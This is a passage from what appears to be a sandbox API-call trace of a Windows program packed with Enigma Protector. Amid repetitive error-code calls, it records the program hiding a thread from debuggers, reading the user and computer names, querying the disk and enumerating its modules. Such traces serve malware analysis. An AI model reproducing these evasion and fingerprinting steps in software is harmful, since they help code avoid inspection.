ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0 [0127.929] GetLastError () returned 0x12 [0127.929] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.929] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\", psz="c:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj") returned 1 [0127.929] SysReAllocStringLen (in: pbstr=0x28fda8*="c:\\Users\\kEecfMwgj", psz="c:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28fda8*="c:\\Users\\kEecfMwgj\\") returned 1 [0127.930] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28fad8*="c:\\Users\\kEecfMwgj\\") returned 1 [0127.930] SysReAllocStringLen (in: pbstr=0x28fda8*="c:\\Users\\kEecfMwgj\\", psz="c:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28fda8*="c:\\Users\\kEecfMwgj") returned 1 [0127.930] SysReAllocStringLen (in: pbstr=0x28fdac*=0x0, psz="c:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28fdac*="c:\\Users\\kEecfMwgj") returned 1 [0127.931] SysReAllocStringLen (in: pbstr=0x3370090*=0x0, psz="c:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x3370090*="c:\\Users\\kEecfMwgj\\") returned 1 [0127.931] VirtualFree (lpAddress=0x3374000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0127.934] GetLastError () returned 0x0 [0127.935] SetLastError (dwErrCode=0x0) [0127.984] GetLastError () returned 0x0 [0127.984] SetLastError (dwErrCode=0x0) [0127.985] GetLastError () returned 0x0 [0127.985] SetLastError (dwErrCode=0x0) [0127.985] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0127.986] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0127.986] GetCurrentThread () returned 0xfffffffe [0127.986] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0127.986] GetLastError () returned 0x0 [0127.986] SetLastError (dwErrCode=0x0) [0127.986] GetLastError () returned 0x0 [0127.986] SetLastError (dwErrCode=0x0) [0127.987] GetLastError () returned 0x0 [0127.987] SetLastError (dwErrCode=0x0) [0128.037] GetLastError () returned 0x0 [0128.037] SetLastError (dwErrCode=0x0) [0128.037] GetLastError () returned 0x0 [0128.037] SetLastError (dwErrCode=0x0) [0128.037] GetLastError () returned 0x0 [0128.038] SetLastError (dwErrCode=0x0) [0128.038] GetLastError () returned 0x0 [0128.038] SetLastError (dwErrCode=0x0) [0128.094] GetLastError () returned 0x0 [0128.094] SetLastError (dwErrCode=0x0) [0128.094] GetLastError () returned 0x0 [0128.094] SetLastError (dwErrCode=0x0) [0128.144] GetLastError () returned 0x0 [0128.144] SetLastError (dwErrCode=0x0) [0128.194] GetLastError () returned 0x0 [0128.194] SetLastError (dwErrCode=0x0) [0128.194] GetLastError () returned 0x0 [0128.194] SetLastError (dwErrCode=0x0) [0128.243] GetLastError () returned 0x0 [0128.243] SetLastError (dwErrCode=0x0) [0128.243] GetLastError () returned 0x0 [0128.243] SetLastError (dwErrCode=0x0) [0128.243] GetLastError () returned 0x0 [0128.243] SetLastError (dwErrCode=0x0) [0128.363] GetLastError () returned 0x0 [0128.363] SetLastError (dwErrCode=0x0) [0128.363] GetLastError () returned 0x0 [0128.363] SetLastError (dwErrCode=0x0) [0128.363] GetLastError () returned 0x0 [0128.364] SetLastError (dwErrCode=0x0) [0128.412] GetLastError () returned 0x0 [0128.412] SetLastError (dwErrCode=0x0) [0128.412] GetLastError () returned 0x0 [0128.412] SetLastError (dwErrCode=0x0) [0128.412] GetLastError () returned 0x0 [0128.412] SetLastError (dwErrCode=0x0) [0128.460] VirtualQuery (in: lpAddress=0x401000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x401000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x6000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0128.460] VirtualQuery (in: lpAddress=0x423000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x423000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0xa000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0128.460] VirtualQuery (in: lpAddress=0x425000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x425000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x8000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0128.461] VirtualQuery (in: lpAddress=0x400000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0128.461] GetLastError () returned 0x0 [0128.461] SetLastError (dwErrCode=0x0) [0128.461] GetLastError () returned 0x0 [0128.461] SetLastError (dwErrCode=0x0) [0128.461] GetLastError () returned 0x0 [0128.461] SetLastError (dwErrCode=0x0) [0128.462] GetUserNameA (in: lpBuffer=0x557338, pcbBuffer=0x557334 | out: lpBuffer="kEecfMwgj", pcbBuffer=0x557334) returned 1 [0128.470] GetLastError () returned 0x0 [0128.470] SetLastError (dwErrCode=0x0) [0128.521] GetLastError () returned 0x0 [0128.521] SetLastError (dwErrCode=0x0) [0128.522] GetLastError () returned 0x0 [0128.522] SetLastError (dwErrCode=0x0) [0128.522] GetLastError () returned 0x0 [0128.522] SetLastError (dwErrCode=0x0) [0128.522] GetLastError () returned 0x0 [0128.522] SetLastError (dwErrCode=0x0) [0128.522] GetLastError () returned 0x0 [0128.522] SetLastError (dwErrCode=0x0) [0128.570] GetComputerNameA (in: lpBuffer=0x55744c, nSize=0x557448 | out: lpBuffer="Q9IATRKPRH", nSize=0x557448) returned 1 [0128.571] GetLastError () returned 0xcb [0128.571] SetLastError (dwErrCode=0xcb) [0128.571] GetLastError () returned 0xcb [0128.572] SetLastError (dwErrCode=0xcb) [0128.572] GetLastError () returned 0xcb [0128.572] SetLastError (dwErrCode=0xcb) [0128.621] GetLastError () returned 0xcb [0128.621] SetLastError (dwErrCode=0xcb) [0128.621] GetLastError () returned 0xcb [0128.621] SetLastError (dwErrCode=0xcb) [0128.621] GetLastError () returned 0xcb [0128.621] SetLastError (dwErrCode=0xcb) [0128.621] GetLastError () returned 0xcb [0128.622] SetLastError (dwErrCode=0xcb) [0128.672] GetLastError () returned 0xcb [0128.673] SetLastError (dwErrCode=0xcb) [0128.673] GetLastError () returned 0xcb [0128.673] SetLastError (dwErrCode=0xcb) [0128.673] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="Software\\Enigma Protector\\%.8x%.8x-%.8x%.8x", cbMultiByte=43, lpWideCharStr=0x28ee68, cchWideChar=2047 | out: lpWideCharStr="Software\\Enigma Protector\\%.8x%.8x-%.8x%.8x") returned 43 [0128.673] GetLastError () returned 0x0 [0128.673] SetLastError (dwErrCode=0x0) [0128.722] GetLastError () returned 0x0 [0128.722] SetLastError (dwErrCode=0x0) [0128.722] GetLastError () returned 0x0 [0128.723] SetLastError (dwErrCode=0x0) [0128.723] GetLastError () returned 0x0 [0128.723] SetLastError (dwErrCode=0x0) [0128.772] GetLastError () returned 0x0 [0128.772] SetLastError (dwErrCode=0x0) [0128.834] GetLastError () returned 0x0 [0128.834] SetLastError (dwErrCode=0x0) [0128.834] GetLastError () returned 0x0 [0128.834] SetLastError (dwErrCode=0x0) [0128.834] SysReAllocStringLen (in: pbstr=0x3341c74*=0x0, psz="Software\\Enigma Protector\\29AEB4A0365755F6-B862CAE984EA4D0E", len=0x3b | out: pbstr=0x3341c74*="Software\\Enigma Protector\\29AEB4A0365755F6-B862CAE984EA4D0E") returned 1 [0128.834] GetLastError () returned 0x0 [0128.834] SetLastError (dwErrCode=0x0) [0128.904] GetLastError () returned 0x0 [0128.904] SetLastError (dwErrCode=0x0) [0128.904] GetLastError () returned 0x0 [0128.904] SetLastError (dwErrCode=0x0) [0128.904] VirtualQuery (in: lpAddress=0x401000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x401000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x6000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0128.904] VirtualQuery (in: lpAddress=0x423000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x423000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0xa000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0128.905] VirtualQuery (in: lpAddress=0x425000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x425000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x8000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0128.905] VirtualQuery (in: lpAddress=0x400000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0128.905] GetLastError () returned 0x0 [0128.905] SetLastError (dwErrCode=0x0) [0128.905] GetLastError () returned 0x0 [0128.905] SetLastError (dwErrCode=0x0) [0128.905] GetLastError () returned 0x0 [0128.906] SetLastError (dwErrCode=0x0) [0129.056] GetWindowsDirectoryA (in: lpBuffer=0x28fcfb, uSize=0x105 | out: lpBuffer="C:\\Windows") returned 0xa [0129.134] CreateFileA (lpFileName="\\\\.\\C:" (normalized: "c:"), dwDesiredAccess=0x0, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x11c [0129.134] DeviceIoControl (in: hDevice=0x11c, dwIoControlCode=0x2d1400, lpInBuffer=0x28fe00*, nInBufferSize=0xc, lpOutBuffer=0x33701a8, nOutBufferSize=0x2710, lpBytesReturned=0x28fe10, lpOverlapped=0x0 | out: lpInBuffer=0x28fe00*, lpOutBuffer=0x33701a8*, lpBytesReturned=0x28fe10*=0xa7, lpOverlapped=0x0) returned 1 [0129.135] CloseHandle (hObject=0x11c) returned 1 [0129.213] GetLastError () returned 0x0 [0129.213] SetLastError (dwErrCode=0x0) [0129.213] GetLastError () returned 0x0 [0129.213] SetLastError (dwErrCode=0x0) [0129.213] GetLastError () returned 0x0 [0129.214] SetLastError (dwErrCode=0x0) [0129.214] GetLastError () returned 0x0 [0129.214] SetLastError (dwErrCode=0x0) [0129.284] GetLastError () returned 0x0 [0129.284] SetLastError (dwErrCode=0x0) [0129.284] GetLastError () returned 0x0 [0129.284] SetLastError (dwErrCode=0x0) [0129.401] GetLastError () returned 0x0 [0129.402] SetLastError (dwErrCode=0x0) [0129.474] GetLastError () returned 0x0 [0129.474] SetLastError (dwErrCode=0x0) [0129.474] GetLastError () returned 0x0 [0129.474] SetLastError (dwErrCode=0x0) [0129.474] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0129.475] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0129.475] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0129.475] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0129.476] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0129.476] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0129.476] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0129.477] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0129.477] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0129.478] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0129.478] GetLastError () returned 0x0 [0129.478] SetLastError (dwErrCode=0x0) [0129.478] GetLastError () returned 0x0 [0129.478] SetLastError (dwErrCode=0x0) [0129.478] GetLastError () returned 0x0 [0129.478] SetLastError (dwErrCode=0x0) [0129.564] GetCurrentProcessId () returned 0xfd4 [0129.564] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0129.564] GetProcAddress (hModule=0x75a80000, lpProcName="CreateToolhelp32Snapshot") returned 0x75ab7327 [0129.564] GetProcAddress (hModule=0x75a80000, lpProcName="Heap32ListFirst") returned 0x75b15bc1 [0129.564] GetProcAddress (hModule=0x75a80000, lpProcName="Heap32ListNext") returned 0x75b15c6b [0129.565] GetProcAddress (hModule=0x75a80000, lpProcName="Heap32First") returned 0x75b15d03 [0129.565] GetProcAddress (hModule=0x75a80000, lpProcName="Heap32Next") returned 0x75b15eee [0129.565] GetProcAddress (hModule=0x75a80000, lpProcName="Toolhelp32ReadProcessMemory") returned 0x75b160f3 [0129.565] GetProcAddress (hModule=0x75a80000, lpProcName="Process32First") returned 0x75ab8abb [0129.565] GetProcAddress (hModule=0x75a80000, lpProcName="Process32Next") returned 0x75ab8812 [0129.565] GetProcAddress (hModule=0x75a80000, lpProcName="Process32FirstW") returned 0x75ab8b83 [0129.565] GetProcAddress (hModule=0x75a80000, lpProcName="Process32NextW") returned 0x75ab88da [0129.566] GetProcAddress (hModule=0x75a80000, lpProcName="Thread32First") returned 0x75b16133 [0129.566] GetProcAddress (hModule=0x75a80000, lpProcName="Thread32Next") returned 0x75b161df [0129.566] GetProcAddress (hModule=0x75a80000, lpProcName="Module32First") returned 0x75b16279 [0129.566] GetProcAddress (hModule=0x75a80000, lpProcName="Module32Next") returned 0x75b16362 [0129.566] GetProcAddress (hModule=0x75a80000, lpProcName="Module32FirstW") returned 0x75ab79c1 [0129.566] GetProcAddress (hModule=0x75a80000, lpProcName="Module32NextW") returned 0x75ab7d5e [0129.567] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0xfd4) returned 0x120 [0129.570] Module32First (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0129.571] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0129.572] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0129.573] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0129.574] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0129.575] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0129.576] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0129.577] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0129.578] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0129.580] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0129.581] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0129.582] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0129.583] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0129.584] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0129.585] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0129.586] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0129.586] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0129.587] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0129.588] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0129.589] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0129.590] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0129.592] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0129.593] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0129.594] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0129.595] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0129.596] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0129.597] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 0 [0129.598] CloseHandle (hObject=0x120) returned 1 [0129.598] GetLastError () returned 0x12 [0129.598] SetLastError (dwErrCode=0x12) [0129.598] GetLastError () returned 0x12 [0129.598] SetLastError (dwErrCode=0x12) [0129.598] GetLastError () returned 0x12 [0129.599] SetLastError (dwErrCode=0x12) [0129.762] GetLastError () returned 0x12 [0129.763] SetLastError (dwErrCode=0x12) [0129.763] GetLastError () returned 0x12 [0129.763] SetLastError (dwErrCode=0x12) [0129.763] GetLastError () returned 0x12 [0129.763] SetLastError (dwErrCode=0x12) [0129.763] GetLastError () returned 0x12 [0129.763] SetLastError (dwErrCode=0x12) [0129.763] GetLastError () returned 0x12 [0129.764] SetLastError (dwErrCode=0x12) [0129.764] GetLastError () returned 0x12 [0129.764] SetLastError (dwErrCode=0x12) [0129.850] GetLastError () returned 0x12 [0129.850] SetLastError (dwErrCode=0x12) [0129.850] GetLastError () returned 0x12 [0129.850] SetLastError (dwErrCode=0x12) [0129.850] GetLastError () returned 0x12 [0129.851] SetLastError (dwErrCode=0x12) [0129.913] GetLastError () returned 0x12 [0129.913] SetLastError (dwErrCode=0x12) [0129.913] GetLastError () returned 0x12 [0129.914] SetLastError (dwErrCode=0x12) [0129.914] GetLastError () returned 0x12 [0129.914] SetLastError (dwErrCode=0x12) [0129.914] GetLastError () returned 0x12 [0129.914] SetLastError (dwErrCode=0x12) [0129.914] GetLastError () returned 0x12 [0129.914] SetLastError (dwErrCode=0x12) [0129.963] GetLastError () returned 0x12 [0129.965] SetLastError (dwErrCode=0x12) [0129.965] GetLastError () returned 0x12 [0129.965] SetLastError (dwErrCode=0x12) [0129.965] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0129.965] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0129.966] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0129.966] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0129.966] GetLastError () returned 0x0 [0129.967] SetLastError (dwErrCode=0x0) [0129.967] GetLastError () returned 0x0 [0129.967] SetLastError (dwErrCode=0x0) [0129.967] GetLastError () returned 0x0 [0129.967] SetLastError (dwErrCode=0x0) [0130.015] VirtualQuery (in: lpAddress=0x401000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x401000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x2000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0130.015] VirtualQuery (in: lpAddress=0x423000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x423000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0xa000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0130.015] VirtualQuery (in: lpAddress=0x425000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x425000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x8000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0130.015] VirtualQuery (in: lpAddress=0x400000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0130.015] GetLastError () returned 0x0 [0130.015] SetLastError (dwErrCode=0x0) [0130.015] GetLastError () returned 0x0 [0130.015] SetLastError (dwErrCode=0x0) [0130.016] GetLastError () returned 0x0 [0130.016] SetLastError (dwErrCode=0x0) [0130.016] GetLastError () returned 0x0 [0130.016] SetLastError (dwErrCode=0x0) [0130.064] GetLastError () returned 0x0 [0130.065] SetLastError (dwErrCode=0x0) [0130.065] GetLastError () returned 0x0 [0130.065] SetLastError (dwErrCode=0x0) [0130.065] GetLastError () returned 0x0 [0130.065] SetLastError (dwErrCode=0x0) [0130.065] GetLastError () returned 0x0 [0130.066] SetLastError (dwErrCode=0x0) [0130.066] GetLastError () returned 0x0 [0130.066] SetLastError (dwErrCode=0x0) [0130.166] GetLastError () returned 0x0 [0130.166] SetLastError (dwErrCode=0x0) [0130.166] GetLastError () returned 0x0 [0130.167] SetLastError (dwErrCode=0x0) [0130.167] GetLastError () returned 0x0 [0130.167] SetLastError (dwErrCode=0x0) [0130.223] GetLastError () returned 0x0 [0130.223] SetLastError (dwErrCode=0x0) [0130.224] GetLastError () returned 0x0 [0130.224] SetLastError (dwErrCode=0x0) [0130.224] GetLastError () returned 0x0 [0130.224] SetLastError (dwErrCode=0x0) [0130.224] GetLastError () returned 0x0 [0130.224] SetLastError (dwErrCode=0x0) [0130.274] GetLastError () returned 0x0 [0130.274] SetLastError (dwErrCode=0x0) [0130.274] GetLastError () returned 0x0 [0130.274] SetLastError (dwErrCode=0x0) [0130.274] GetLastError () returned 0x0 [0130.274] SetLastError (dwErrCode=0x0) [0130.327] GetLastError () returned 0x0 [0130.327] SetLastError (dwErrCode=0x0) [0130.327] GetLastError () returned 0x0 [0130.328] SetLastError (dwErrCode=0x0) [0130.328] GetLastError () returned 0x0 [0130.328] SetLastError (dwErrCode=0x0) [0130.398] GetLastError () returned 0x0 [0130.399] SetLastError (dwErrCode=0x0) [0130.399] GetLastError () returned 0x0 [0130.399] SetLastError (dwErrCode=0x0) [0130.399] GetLastError () returned 0x0 [0130.399] SetLastError (dwErrCode=0x0) [0130.399] GetLastError () returned 0x0 [0130.399] SetLastError (dwErrCode=0x0) [0130.399] GetLastError () returned 0x0 [0130.400] SetLastError (dwErrCode=0x0) [0130.449] GetLastError () returned 0x0 [0130.449] SetLastError (dwErrCode=0x0) [0130.449] GetLastError () returned 0x0 [0130.449] SetLastError (dwErrCode=0x0) [0130.449] GetLastError () returned 0x0 [0130.449] SetLastError (dwErrCode=0x0) [0130.449] GetLastError () returned 0x0 [0130.450] SetLastError (dwErrCode=0x0) [0130.500] GetLastError () returned 0x0 [0130.500] SetLastError (dwErrCode=0x0) [0130.500] GetLastError () returned 0x0 [0130.500] SetLastError (dwErrCode=0x0) [0130.500] VirtualQuery (in: lpAddress=0x401000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x401000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x2000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0130.501] VirtualQuery (in: lpAddress=0x423000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x423000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0xa000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0130.501] VirtualQuery (in: lpAddress=0x425000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x425000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x8000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0130.501] VirtualQuery (in: lpAddress=0x400000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0130.501] GetLastError () returned 0x0 [0130.502] SetLastError (dwErrCode=0x0) [0130.551] GetLastError () returned 0x0 [0130.551] SetLastError (dwErrCode=0x0) [0130.551] GetLastError () returned 0x0 [0130.551] SetLastError (dwErrCode=0x0) [0130.819] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="SOFTWARE\\EnigmaDevelopers", cchWideChar=25, lpMultiByteStr=0x28eda8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SOFTWARE\\EnigmaDevelopers§©w", lpUsedDefaultChar=0x0) returned 25 [0130.819] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="SOFTWARE\\EnigmaDevelopers", ulOptions=0x0, samDesired=0x20019, phkResult=0x28fdac | out: phkResult=0x28fdac*=0x0) returned 0x2 [0130.924] GetLastError () returned 0x0 [0130.925] SetLastError (dwErrCode=0x0) [0130.925] GetLastError () returned 0x0 [0130.925] SetLastError (dwErrCode=0x0) [0130.925] GetLastError () returned 0x0 [0130.925] SetLastError (dwErrCode=0x0) [0130.976] GetLastError () returned 0x0 [0130.976] SetLastError (dwErrCode=0x0) [0130.976] GetLastError () returned 0x0 [0130.976] SetLastError (dwErrCode=0x0) [0130.976] GetLastError () returned 0x0 [0130.976] SetLastError (dwErrCode=0x0) [0131.029] GetLastError () returned 0x0 [0131.029] SetLastError (dwErrCode=0x0) [0131.029] GetLastError () returned 0x0 [0131.029] SetLastError (dwErrCode=0x0) [0131.029] GetLastError () returned 0x0 [0131.030] SetLastError (dwErrCode=0x0) [0131.030] GetLocalTime (in: lpSystemTime=0x28fdcc | out: lpSystemTime=0x28fdcc*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x25, wMilliseconds=0x4a)) [0131.030] GetLocalTime (in: lpSystemTime=0x28fdcc | out: lpSystemTime=0x28fdcc*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x25, wMilliseconds=0x4a)) [0131.031] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="80EB2F5C", cbMultiByte=8, lpWideCharStr=0x28edd8, cchWideChar=2047 | out: lpWideCharStr="80EB2F5C䕁㑂ぁ㘳㜵㔵㙆䈭㘸䌲䕁㠹䔴㑁い居㈰う䘱㔵䄳ㄱ䐲䕃〭䌰䐹㍂䌸㠱㕄䑆┱ĕ(䘨睝◤ĕ(V") returned 8 [0131.031] GetLocalTime (in: lpSystemTime=0x28fd28 | out: lpSystemTime=0x28fd28*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x25, wMilliseconds=0x4a)) [0131.031] GetLocalTime (in: lpSystemTime=0x28fd28 | out: lpSystemTime=0x28fd28*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x25, wMilliseconds=0x4a)) [0131.031] GetLocalTime (in: lpSystemTime=0x28fd28 | out: lpSystemTime=0x28fd28*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x25, wMilliseconds=0x4a)) [0131.031] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Enigma Protector\\29AEB4A0365755F6-B862CAE984EA4D0E\\02F01F553A112DCE-00C9DB38C18D5FD1", ulOptions=0x0, samDesired=0x20019, phkResult=0x28fce4 | out: phkResult=0x28fce4*=0x0) returned 0x2 [0131.032] CreateFileW (lpFileName="c:\\users\\keecfmwgj\\appdata\\local\\temp\\80EB2F5C" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\80eb2f5c"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0131.035] GetLocalTime (in: lpSystemTime=0x28fd24 | out: lpSystemTime=0x28fd24*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x25, wMilliseconds=0x4a)) [0131.035] GetLastError () returned 0x0 [0131.035] SetLastError (dwErrCode=0x0) [0131.085] GetLastError () returned 0x0 [0131.085] SetLastError (dwErrCode=0x0) [0131.085] GetLastError () returned 0x0 [0131.085] SetLastError (dwErrCode=0x0) [0131.135] GetLocalTime (in: lpSystemTime=0x28fe50 | out: lpSystemTime=0x28fe50*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x25, wMilliseconds=0x78)) [0131.135] GetLastError () returned 0x0 [0131.135] SetLastError (dwErrCode=0x0) [0131.187] GetLastError () returned 0x0 [0131.188] SetLastError (dwErrCode=0x0) [0131.188] GetLastError () returned 0x0 [0131.188] SetLastError 